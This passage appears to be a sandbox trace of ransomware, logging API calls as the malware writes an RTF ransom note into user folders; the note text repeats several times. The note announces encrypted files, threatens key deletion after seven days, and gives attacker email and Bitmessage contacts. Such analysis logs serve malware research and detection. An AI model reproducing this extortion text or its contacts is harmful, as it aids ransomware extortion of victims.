;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nûê9ÿâ\x8c\x9b\x8b­¹Åü\x03§#-*\n5\x90W\x1e\x1fc\x9e", lpUsedDefaultChar=0x0) returned 8717 [0295.901] WriteFile (in: hFile=0x2ec, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.902] CloseHandle (hObject=0x2ec) returned 1 [0295.904] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\xh-za\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\xh-za\\#readme_eman#.rtf")) returned 0xffffffff [0295.904] GetLastError () returned 0x2 [0295.904] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\xh-za\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\xh-za\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.909] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.909] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.909] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 